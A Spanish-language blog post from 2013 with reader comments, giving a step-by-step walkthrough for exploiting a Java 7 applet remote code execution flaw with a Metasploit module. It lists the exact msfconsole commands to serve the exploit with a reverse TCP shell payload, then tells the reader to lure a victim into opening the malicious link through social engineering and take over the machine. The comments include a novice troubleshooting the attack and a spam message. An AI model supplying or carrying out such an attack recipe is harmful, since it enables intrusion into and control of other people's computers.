miércoles, 23 de enero de 2013

Exploiting Java Applet AverageRangeStatisticImpl Remote Code Execution



Hoy 23 de Enero, Oracle nuevamente es blanco de los "Hackers", pues se ha publicado una nueva vulnerabilidad que afectan a las versiones de Java 7u7-10 y anteriores, permitiendo a un atacante ejecutar código remoto en el sistema de la victima (Windows - Linux - MAC), para ello el equipo de Metasploit ha desarrollado un modulo denominado java_jre17_glassfish_averagerangestatisticimpl que facilita el trabajo a un atacante en el proceso de explotacion de esta nueva vulnerabilidad.

El respectivo modulo se puede obtener con tal solo ejecutar el comando msfupdate y los pasos para aprovecharse de esta vulnerabilidad, son los siguientes:


REQUERIMIENTOS:

BackTrack 5 R1 - R2 o R3 (Atacante)
Metasploit Framework (Atacante)
Windows XP - 7 - 8 (Victima)
Java 7 Update 7 (Victima)

PROCEDIMIENTOS:

En la terminal/consola tecleamos msfconsole y seguidamente ejecutamos los siguientes comandos:

-------------------------------------------------------------------------------------------------------------
use exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl
set payload java/shell_reverse_tcp
set LHOST 192.168.1.33
set URIPATH /
exploit
-------------------------------------------------------------------------------------------------------------


Como ya es de conocimiento, tenemos que ejecutar estos comandos para poder generar una URL que contendrá los archivos maliciosos que se ejecutaran en el navegador de la victima, como también generar la conexión entre el ordenador de la victima y la nuestra.

Después de realizar dicho paso, es necesario enviar el LINK malicioso, ya sea con nuestra IP o cualquier otro Fake y usar la Ing. Social para que la victima pueda abrir desde su navegador nuestro LINK. Dicho link enviara 2 archivos en formato .jar y otro que es un simple icono.


Si los archivos que Metasploit ha enviado se ejecutan de una forma exitosa, esta automáticamente generara una conexión reversa entre el ordenador de la victima y la nuestra, permitiendonos ejecutar cualquier tipo de comandos para aprovecharnos del sistema vulnerado y tratar de escalar privilegios siempre y cuando sea de nuestro interés.


El exploit y ataque se realizo contra un Sistema Operativo Windows 7 con la versión de Java 1.7.0_07-b10.




Saludos.

4 comentarios:

  1. Buenos Dias Caleb es un gusto saludarte

    Mira tengo una consulta, he instalado Java 7 update 10 en windows 7 para hacer las pruebas.... pero al momento de enviar los archivos a windows 7, en backtrack se queda en la segunda linea de envio de los archivos .jar y en windows sale un mensaje de que si deceo ejecutar el archivo... doy que si y no sucede nada.... amm me da un poco de pena preguntar porque soy nuevo pero igual quiero aprender....

    te agradesco tu respuesta.

    un saludo

    ResponderEliminar
    Respuestas
    1. Hola,

      El exploit solo afecta a las versiones Java 7 update 7 y anteriores, quiza sea ese el problema.

      Saludos.

      Eliminar
  2. Hey it was very nice article i think you have very much interest on Informatica Online Training. . Keep doing awesome article regarding Informatica..

    ResponderEliminar
  3. hola, me podrías colaborar, tengo un problema no he podido descargar el modulo java_jre17_glassfish_averagerangestatisticimpl me podrías orientar sobre como debo descargarlo o que debo de hacer gracias

    ResponderEliminar